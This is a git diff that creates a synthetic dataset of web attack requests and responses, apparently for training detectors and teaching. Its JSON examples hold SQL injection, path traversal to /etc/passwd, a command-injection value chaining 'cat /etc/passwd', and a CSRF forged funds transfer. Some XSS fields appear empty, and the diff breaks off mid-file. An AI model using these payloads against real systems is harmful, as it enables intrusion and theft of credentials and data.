diff --git a/README.md b/README.md index dbfdca5..862b70e 100644 --- a/README.md +++ b/README.md @@ -1 +1,212 @@ -# synthetic-security-dataset \ No newline at end of file +# Synthetic Security Dataset + +A comprehensive dataset of HTTP request and response examples demonstrating various types of malicious attacks. This dataset is designed for security research, training machine learning models for threat detection, and educational purposes. + +## Overview + +This repository contains synthetic examples of common web application security attacks, organized by attack category. Each example includes: + +- Complete HTTP request details (method, URL, headers, body) +- Corresponding HTTP response +- Attack vector description +- Malicious payload +- Detection indicators + +## Dataset Structure + +``` +dataset/ +├── schema.json # JSON schema defining the data structure +├── sql-injection/ # SQL injection attack examples +├── xss/ # Cross-Site Scripting (XSS) examples +├── csrf/ # Cross-Site Request Forgery examples +├── path-traversal/ # Directory/path traversal examples +├── command-injection/ # OS command injection examples +└── xxe/ # XML External Entity (XXE) examples +``` + +## Attack Categories + +### 1. SQL Injection +SQL injection attacks attempt to manipulate database queries by inserting malicious SQL code into input fields. + +**Examples:** +- Authentication bypass +- UNION-based data extraction +- Blind SQL injection + +### 2. Cross-Site Scripting (XSS) +XSS attacks inject malicious scripts into web pages viewed by other users. + +**Examples:** +- Reflected XSS via URL parameters +- Stored XSS via user-generated content +- DOM-based XSS + +### 3. Cross-Site Request Forgery (CSRF) +CSRF attacks trick users into executing unwanted actions on web applications where they're authenticated. + +**Examples:** +- State-changing requests without CSRF tokens +- Malicious form auto-submission + +### 4. Path Traversal +Path traversal attacks access files and directories outside the intended directory structure. + +**Examples:** +- Reading system files using dot-dot-slash sequences +- Accessing sensitive configuration files + +### 5. Command Injection +Command injection attacks execute arbitrary operating system commands on the server. + +**Examples:** +- Command chaining using semicolons +- Piping commands +- Command substitution + +### 6. XML External Entity (XXE) +XXE attacks exploit XML parsers that process external entity references. + +**Examples:** +- Local file disclosure +- Server-side request forgery (SSRF) +- Denial of service + +## Data Format + +Each attack example is stored as a JSON file following this structure: + +```json +{ + "id": "unique-identifier", + "category": "Attack Category", + "description": "Description of the attack scenario", + "severity": "critical|high|medium|low", + "request": { + "method": "HTTP_METHOD", + "url": "/path?params", + "headers": {}, + "body": "request body or null" + }, + "response": { + "status": 200, + "headers": {}, + "body": "response body" + }, + "attack_vector": "Explanation of how the attack works", + "payload": "The actual malicious payload", + "indicators": ["indicator1", "indicator2"] +} +``` + +See `dataset/schema.json` for the complete JSON schema definition. + +## Usage + +### Loading the Dataset + +#### Python +```python +import json +import os +from pathlib import Path + +def load_dataset(dataset_path='dataset'): + examples = [] + for category_dir in Path(dataset_path).iterdir(): + if category_dir.is_dir(): + for example_file in category_dir.glob('*.json'): + try: + with open(example_file, 'r') as f: + examples.append(json.load(f)) + except json.JSONDecodeError as e: + print(f"Error parsing {example_file}: {e}") + return examples + +# Load all examples +dataset = load_dataset() +print(f"Loaded {len(dataset)} attack examples") +``` + +#### JavaScript/Node.js +```javascript +const fs = require('fs'); +const path = require('path'); + +function loadDataset(datasetPath = 'dataset') { + const examples = []; + const categories = fs.readdirSync(datasetPath); + + categories.forEach(category => { + const categoryPath = path.join(datasetPath, category); + if (fs.statSync(categoryPath).isDirectory()) { + const files = fs.readdirSync(categoryPath); + files.forEach(file => { + if (file.endsWith('.json')) { + try { + const data = JSON.parse( + fs.readFileSync(path.join(categoryPath, file), 'utf8') + ); + examples.push(data); + } catch (error) { + console.error(`Error parsing ${file}:`, error.message); + } + } + }); + } + }); + + return examples; +} + +// Load all examples +const dataset = loadDataset(); +console.log(`Loaded ${dataset.length} attack examples`); +``` + +### Filtering by Category + +```python +# Get all SQL injection examples +sql_injections = [ex for ex in dataset if ex['category'] == 'SQL Injection'] + +# Get all critical severity attacks +critical_attacks = [ex for ex in dataset if ex['severity'] == 'critical'] +``` + +## Use Cases + +1. **Security Training**: Educational resource for learning about common web vulnerabilities +2. **Machine Learning**: Training data for developing attack detection models +3. **Testing Security Tools**: Benchmark dataset for evaluating WAF, IDS/IPS systems +4. **Security Research**: Reference examples for studying attack patterns +5. **CTF Challenges**: Base material for capture-the-flag security exercises + +## Contributing + +Contributions are welcome! To add new attack examples: + +1. Follow the JSON schema defined in `dataset/schema.json` +2. Place the example in the appropriate category directory +3. Use descriptive IDs and clear descriptions +4. Include realistic HTTP headers and responses +5. Provide clear indicators for detection + +## Important Notes + +⚠️ **Warning**: This dataset contains examples of malicious attacks. Use only for: +- Educational purposes +- Security research +- Controlled testing environments +- Training security systems + +**DO NOT** use these examples to attack real systems. Unauthorized access to computer systems is illegal. + +## License + +This dataset is provided for educational and research purposes. Please use responsibly and ethically. + +## Disclaimer + +The examples in this dataset are synthetic and created for educational purposes. They should only be used in controlled environments with proper authorization. The maintainers are not responsible for any misuse of this information. \ No newline at end of file diff --git a/dataset/command-injection/example-1.json b/dataset/command-injection/example-1.json new file mode 100644 index 0000000..27bf765 --- /dev/null +++ b/dataset/command-injection/example-1.json @@ -0,0 +1,29 @@ +{ + "id": "command-injection-001", + "category": "Command Injection", + "description": "OS command injection through ping utility", + "severity": "critical", + "request": { + "method": "POST", + "url": "/network-tools/ping", + "headers": { + "Content-Type": "application/json", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" + }, + "body": "{\"host\": \"8.8.8.8; cat /etc/passwd\"}" + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "text/plain" + }, + "body": "PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.\n64 bytes from 8.8.8.8: icmp_seq=1 ttl=64 time=0.045 ms\n\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + }, + "attack_vector": "Command injection using semicolon to chain commands", + "payload": "8.8.8.8; cat /etc/passwd", + "indicators": [ + "Command separators (;, &&, ||)", + "System commands in user input", + "Unexpected command output in response" + ] +} diff --git a/dataset/csrf/example-1.json b/dataset/csrf/example-1.json new file mode 100644 index 0000000..c29f31e --- /dev/null +++ b/dataset/csrf/example-1.json @@ -0,0 +1,31 @@ +{ + "id": "csrf-001", + "category": "Cross-Site Request Forgery (CSRF)", + "description": "CSRF attack to transfer funds without user consent", + "severity": "high", + "request": { + "method": "POST", + "url": "/transfer", + "headers": { + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", + "Referer": "http://attacker.com/malicious.html", + "Cookie": "session=victim_session_token" + }, + "body": "to_account=attacker_account&amount=1000¤cy=USD" + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "application/json" + }, + "body": "{\"status\": \"success\", \"message\": \"Transfer completed\", \"transaction_id\": \"txn_987654\"}" + }, + "attack_vector": "CSRF attack initiated from external malicious site", + "payload": "Malicious HTML form auto-submitting to transfer endpoint", + "indicators": [ + "Missing or invalid CSRF token", + "Referer from external domain", + "Unexpected state-changing request" + ] +} diff --git a/dataset/index.json b/dataset/index.json new file mode 100644 index 0000000..10a34fe --- /dev/null +++ b/dataset/index.json @@ -0,0 +1,72 @@ +{ + "dataset_version": "1.0.0", + "created_date": "2025-10-28", + "description": "Synthetic HTTP request/response dataset for malicious attack examples", + "total_examples": 8, + "categories": { + "SQL Injection": { + "count": 2, + "severity_distribution": { + "critical": 2 + }, + "examples": [ + "dataset/sql-injection/example-1.json", + "dataset/sql-injection/example-2.json" + ] + }, + "Cross-Site Scripting (XSS)": { + "count": 2, + "severity_distribution": { + "high": 2 + }, + "examples": [ + "dataset/xss/example-1.json", + "dataset/xss/example-2.json" + ] + }, + "Cross-Site Request Forgery (CSRF)": { + "count": 1, + "severity_distribution": { + "high": 1 + }, + "examples": [ + "dataset/csrf/example-1.json" + ] + }, + "Path Traversal": { + "count": 1, + "severity_distribution": { + "critical": 1 + }, + "examples": [ + "dataset/path-traversal/example-1.json" + ] + }, + "Command Injection": { + "count": 1, + "severity_distribution": { + "critical": 1 + }, + "examples": [ + "dataset/command-injection/example-1.json" + ] + }, + "XML External Entity (XXE)": { + "count": 1, + "severity_distribution": { + "critical": 1 + }, + "examples": [ + "dataset/xxe/example-1.json" + ] + } + }, + "severity_overview": { + "critical": 5, + "high": 3, + "medium": 0, + "low": 0 + }, + "schema_version": "1.0.0", + "schema_location": "dataset/schema.json" +} diff --git a/dataset/path-traversal/example-1.json b/dataset/path-traversal/example-1.json new file mode 100644 index 0000000..5a07988 --- /dev/null +++ b/dataset/path-traversal/example-1.json @@ -0,0 +1,30 @@ +{ + "id": "path-traversal-001", + "category": "Path Traversal", + "description": "Directory traversal attack to access sensitive files", + "severity": "critical", + "request": { + "method": "GET", + "url": "/download?file=../../../../etc/passwd", + "headers": { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)", + "Accept": "*/*" + }, + "body": null + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "text/plain", + "Content-Disposition": "attachment; filename=passwd" + }, + "body": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin" + }, + "attack_vector": "Path traversal using dot-dot-slash sequences", + "payload": "../../../../etc/passwd", + "indicators": [ + "Dot-dot-slash sequences (../)", + "Access to system files", + "Path manipulation in file parameter" + ] +} diff --git a/dataset/schema.json b/dataset/schema.json new file mode 100644 index 0000000..bde1d4e --- /dev/null +++ b/dataset/schema.json @@ -0,0 +1,96 @@ +{ + "$schema": "http://json-schema.org/draft-07/schema#", + "title": "Synthetic Security Dataset Entry", + "description": "Schema for HTTP request/response examples of malicious attacks", + "type": "object", + "required": ["id", "category", "description", "severity", "request", "response", "attack_vector", "payload", "indicators"], + "properties": { + "id": { + "type": "string", + "description": "Unique identifier for the attack example", + "pattern": "^[a-z0-9-]+$" + }, + "category": { + "type": "string", + "description": "Attack category/type", + "enum": [ + "SQL Injection", + "Cross-Site Scripting (XSS)", + "Cross-Site Request Forgery (CSRF)", + "Path Traversal", + "Command Injection", + "XML External Entity (XXE)" + ] + }, + "description": { + "type": "string", + "description": "Detailed description of the attack scenario" + }, + "severity": { + "type": "string", + "description": "Severity level of the attack", + "enum": ["low", "medium", "high", "critical"] + }, + "request": { + "type": "object", + "description": "HTTP request details", + "required": ["method", "url", "headers"], + "properties": { + "method": { + "type": "string", + "description": "HTTP method", + "enum": ["GET", "POST", "PUT", "DELETE", "PATCH", "HEAD", "OPTIONS"] + }, + "url": { + "type": "string", + "description": "Request URL including path and query parameters" + }, + "headers": { + "type": "object", + "description": "HTTP request headers" + }, + "body": { + "type": ["string", "null"], + "description": "Request body content" + } + } + }, + "response": { + "type": "object", + "description": "HTTP response details", + "required": ["status", "headers", "body"], + "properties": { + "status": { + "type": "integer", + "description": "HTTP status code", + "minimum": 100, + "maximum": 599 + }, + "headers": { + "type": "object", + "description": "HTTP response headers" + }, + "body": { + "type": ["string", "null"], + "description": "Response body content" + } + } + }, + "attack_vector": { + "type": "string", + "description": "Explanation of how the attack works" + }, + "payload": { + "type": "string", + "description": "The actual malicious payload used in the attack" + }, + "indicators": { + "type": "array", + "description": "List of indicators that can help detect this type of attack", + "items": { + "type": "string" + }, + "minItems": 1 + } + } +} diff --git a/dataset/sql-injection/example-1.json b/dataset/sql-injection/example-1.json new file mode 100644 index 0000000..050634b --- /dev/null +++ b/dataset/sql-injection/example-1.json @@ -0,0 +1,30 @@ +{ + "id": "sql-injection-001", + "category": "SQL Injection", + "description": "Classic SQL injection attack attempting to bypass authentication", + "severity": "critical", + "request": { + "method": "POST", + "url": "/login", + "headers": { + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" + }, + "body": "username=admin' OR '1'='1&password=anything" + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "application/json", + "Set-Cookie": "session=abc123; HttpOnly; Secure" + }, + "body": "{\"status\": \"success\", \"message\": \"Login successful\", \"user_id\": 1}" + }, + "attack_vector": "Authentication bypass using SQL injection in username field", + "payload": "admin' OR '1'='1", + "indicators": [ + "SQL syntax in input fields", + "Quote characters in username", + "Logical operators (OR) in input" + ] +} diff --git a/dataset/sql-injection/example-2.json b/dataset/sql-injection/example-2.json new file mode 100644 index 0000000..5d847ec --- /dev/null +++ b/dataset/sql-injection/example-2.json @@ -0,0 +1,29 @@ +{ + "id": "sql-injection-002", + "category": "SQL Injection", + "description": "SQL injection using UNION-based attack to extract data", + "severity": "critical", + "request": { + "method": "GET", + "url": "/product?id=1' UNION SELECT username,password FROM users--", + "headers": { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36", + "Accept": "text/html,application/xhtml+xml" + }, + "body": null + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "text/html; charset=utf-8" + }, + "body": "
admin:$2y$10$hashedpassword
" + }, + "attack_vector": "Data exfiltration using UNION-based SQL injection", + "payload": "1' UNION SELECT username,password FROM users--", + "indicators": [ + "UNION keyword in URL parameter", + "SQL comment markers (--)", + "Quote characters in parameter value" + ] +} diff --git a/dataset/xss/example-1.json b/dataset/xss/example-1.json new file mode 100644 index 0000000..7d4ea05 --- /dev/null +++ b/dataset/xss/example-1.json @@ -0,0 +1,29 @@ +{ + "id": "xss-001", + "category": "Cross-Site Scripting (XSS)", + "description": "Reflected XSS attack through URL parameter", + "severity": "high", + "request": { + "method": "GET", + "url": "/search?q=", + "headers": { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", + "Accept": "text/html" + }, + "body": null + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "text/html; charset=utf-8" + }, + "body": "No results found
" + }, + "attack_vector": "Reflected XSS via search parameter", + "payload": "", + "indicators": [ + "Script tags in URL parameters", + "JavaScript code in input", + "Unescaped user input reflected in HTML" + ] +} diff --git a/dataset/xss/example-2.json b/dataset/xss/example-2.json new file mode 100644 index 0000000..7266858 --- /dev/null +++ b/dataset/xss/example-2.json @@ -0,0 +1,29 @@ +{ + "id": "xss-002", + "category": "Cross-Site Scripting (XSS)", + "description": "Stored XSS attack via comment submission", + "severity": "high", + "request": { + "method": "POST", + "url": "/comments", + "headers": { + "Content-Type": "application/json", + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)" + }, + "body": "{\"comment\": \"